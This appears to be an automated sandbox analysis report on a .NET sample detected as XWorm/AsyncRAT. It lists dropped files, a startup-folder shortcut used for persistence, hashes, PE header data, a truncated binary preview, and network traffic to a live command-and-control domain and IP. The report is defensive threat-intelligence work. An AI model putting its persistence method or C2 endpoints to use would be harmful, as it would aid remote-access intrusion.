                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hihtatid.gej.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0ruuskv.ovh.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqxo0dlx.hb1.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_of5qgiga.byg.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pk3ixtz4.ohd.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_puhcbhj4.0r3.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ror0ww35.v0w.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsdrw4bj.45u.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sho010nd.u2n.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sriow40s.4ja.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urap40oz.gof.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3swpjpg.1eo.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zi32kzog.xjr.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Zvas34nq1T.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 27 16:07:01 2024, mtime=Sun Oct 27 16:07:01 2024, atime=Sun Oct 27 16:07:01 2024, length=36864, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):771
                                                                        Entropy (8bit):5.0278556278345485
                                                                        Encrypted:false
                                                                        SSDEEP:12:8xIi4yVlSWChddY///js2LMyytjAQrH/DZL1gZgzBmV:8kglNw+AgMhJAQbFL1QABm
                                                                        MD5:EA7D06210A5FA2F7A87FC82A2E10C077
                                                                        SHA1:61416764E6FC6E54EE71761CD5847CA7F814E73D
                                                                        SHA-256:7CC7CB63E4AC868DF2BD6C8922EFB2A45ED96EEE8DA9DABFF208A666A0387D6B
                                                                        SHA-512:90CA12A43CB1F667161BE5129E78C26273F33F90EF1DCB53AF9319D32B57512B322388702E12CC566EC4B0BC16C3CC5712243E6DED1C8F2AA143A7EA517F8760
                                                                        Malicious:false
                                                                        Preview:L..................F.... ....=..(...=..(...=..(..........................z.:..DG..Yr?.D..U..k0.&...&......vk.v.....Iv|.(......(......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^[Y.............................%..A.p.p.D.a.t.a...B.V.1.....[Y....Roaming.@......CW.^[Y..............................7.R.o.a.m.i.n.g.....f.2.....[Y. .explorer.exe..J......[Y.[Y...........................?.5.e.x.p.l.o.r.e.r...e.x.e.......Z...............-.......Y..............%.....C:\Users\user\AppData\Roaming\explorer.exe........\.....\.....\.....\.....\.e.x.p.l.o.r.e.r...e.x.e.`.......X.......302494...........hT..CrF.f4... .X......,.......hT..CrF.f4... .X......,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                        C:\Users\user\AppData\Roaming\explorer.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Zvas34nq1T.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):36864
                                                                        Entropy (8bit):5.564386838220718
                                                                        Encrypted:false
                                                                        SSDEEP:768:VSjIY2VJO7RWR6nhP7Irb5Fyl98T6YOjhYF9:VwIPwWR6nhP0RFQ98T6YOjM
                                                                        MD5:3830EA8C8B7A7730A6446CA3C8A61180
                                                                        SHA1:CF9E202A5D5139E7E5EE375653397F0DBD5B11A6
                                                                        SHA-256:95E1104DF5D9080402316949DE1137C886F9D53D884CEE12D10AF499F41D5AC1
                                                                        SHA-512:D36F0F3C6D62C2BAE97D1AF80A750149788AB419F4C9717B49337DA18E4B6E0E2BEFF4EAB2D364BB9946649E978EC527CAE1174E9DF1B1FF08CCD87DF6FF8DFF
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 89%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..g................................ ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......,U..TO............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):5.564386838220718
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:Zvas34nq1T.exe
                                                                        File size:36'864 bytes
                                                                        MD5:3830ea8c8b7a7730a6446ca3c8a61180
                                                                        SHA1:cf9e202a5d5139e7e5ee375653397f0dbd5b11a6
                                                                        SHA256:95e1104df5d9080402316949de1137c886f9d53d884cee12d10af499f41d5ac1
                                                                        SHA512:d36f0f3c6d62c2bae97d1af80a750149788ab419f4c9717b49337da18e4b6e0e2beff4eab2d364bb9946649e978ec527cae1174e9df1b1ff08ccd87df6ff8dff
                                                                        SSDEEP:768:VSjIY2VJO7RWR6nhP7Irb5Fyl98T6YOjhYF9:VwIPwWR6nhP0RFQ98T6YOjM
                                                                        TLSH:DDF24A4833914316DAED5FF46EB3A1420639F6038A17EB4E0CD8859B6B67BC189523E7
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..g................................. ........@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:90cececece8e8eb0

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x40a4ce
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x671A9F51 [Thu Oct 24 19:26:09 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa4800x4b.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4d8.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x84d40x86002efed440104d8c79f571376650f8a457False0.4917502332089552data5.6993751684299285IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xc0000x4d80x6002472af5ddbb53779b7381f16b8b9407bFalse0.3756510416666667data3.7216503306685733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xe0000xc0x2003ec8867d86d20189e9da17e1436dcfcbFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_VERSION0xc0a00x244data0.4724137931034483
                                                                        RT_MANIFEST0xc2e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 27, 2024 18:07:11.496541023 CET4978965059192.168.2.4147.185.221.21
                                                                        Oct 27, 2024 18:07:11.501993895 CET6505949789147.185.221.21192.168.2.4
                                                                        Oct 27, 2024 18:07:11.502104044 CET4978965059192.168.2.4147.185.221.21
                                                                        Oct 27, 2024 18:07:11.614803076 CET4978965059192.168.2.4147.185.221.21
                                                                        Oct 27, 2024 18:07:11.620275021 CET6505949789147.185.221.21192.168.2.4
                                                                        Oct 27, 2024 18:07:19.990658998 CET6505949789147.185.221.21192.168.2.4
                                                                        Oct 27, 2024 18:07:19.990897894 CET4978965059192.168.2.4147.185.221.21
                                                                        Oct 27, 2024 18:07:22.949549913 CET4978965059192.168.2.4147.185.221.21
                                                                        Oct 27, 2024 18:07:22.955055952 CET6505949789147.185.221.21192.168.2.4
                                                                        Oct 27, 2024 18:07:25.232074022 CET4986465059192.168.2.4147.185.221.21
                                                                        Oct 27, 2024 18:07:25.237658024 CET6505949864147.185.221.21192.168.2.4
                                                                        Oct 27, 2024 18:07:25.237741947 CET4986465059192.168.2.4147.185.221.21
                                                                        Oct 27, 2024 18:07:25.270648003 CET4986465059192.168.2.4147.185.221.21
                                                                        Oct 27, 2024 18:07:25.275975943 CET6505949864147.185.221.21192.168.2.4
                                                                        Oct 27, 2024 18:07:33.719240904 CET6505949864147.185.221.21192.168.2.4
                                                                        Oct 27, 2024 18:07:33.719360113 CET4986465059192.168.2.4147.185.221.21
                                                                        Oct 27, 2024 18:07:36.667963028 CET4986465059192.168.2.4147.185.221.21
                                                                        Oct 27, 2024 18:07:36.673363924 CET6505949864147.185.221.21192.168.2.4
                                                                        Oct 27, 2024 18:07:36.703881979 CET4992865059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:07:36.709189892 CET6505949928147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:07:36.709292889 CET4992865059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:07:36.731342077 CET4992865059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:07:36.736706018 CET6505949928147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:07:45.217463970 CET6505949928147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:07:45.217628956 CET4992865059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:07:46.980808020 CET4992865059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:07:46.986263990 CET6505949928147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:07:49.123004913 CET4999865059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:07:49.128438950 CET6505949998147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:07:49.129286051 CET4999865059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:07:49.175688028 CET4999865059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:07:49.181310892 CET6505949998147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:07:57.638277054 CET6505949998147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:07:57.640429020 CET4999865059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:07:59.730690956 CET4999865059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:07:59.736222029 CET6505949998147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:08:03.670505047 CET5001065059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:08:03.675950050 CET6505950010147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:08:03.676050901 CET5001065059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:08:03.732853889 CET5001065059192.168.2.4147.185.221.23
                                                                        Oct 27, 2024 18:08:03.738287926 CET6505950010147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:08:12.155473948 CET6505950010147.185.221.23192.168.2.4
                                                                        Oct 27, 2024 18:08:12.155529022 CET5001065059192.168.2.4147.185.221.23

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 27, 2024 18:07:11.455612898 CET5986053192.168.2.41.1.1.1
                                                                        Oct 27, 2024 18:07:11.492434978 CET53598601.1.1.1192.168.2.4
                                                                        Oct 27, 2024 18:07:36.670016050 CET5966353192.168.2.41.1.1.1
                                                                        Oct 27, 2024 18:07:36.703133106 CET53596631.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Oct 27, 2024 18:07:11.455612898 CET192.168.2.41.1.1.10xa34fStandard query (0)develop-versions.gl.at.ply.ggA (IP address)IN (0x0001)false
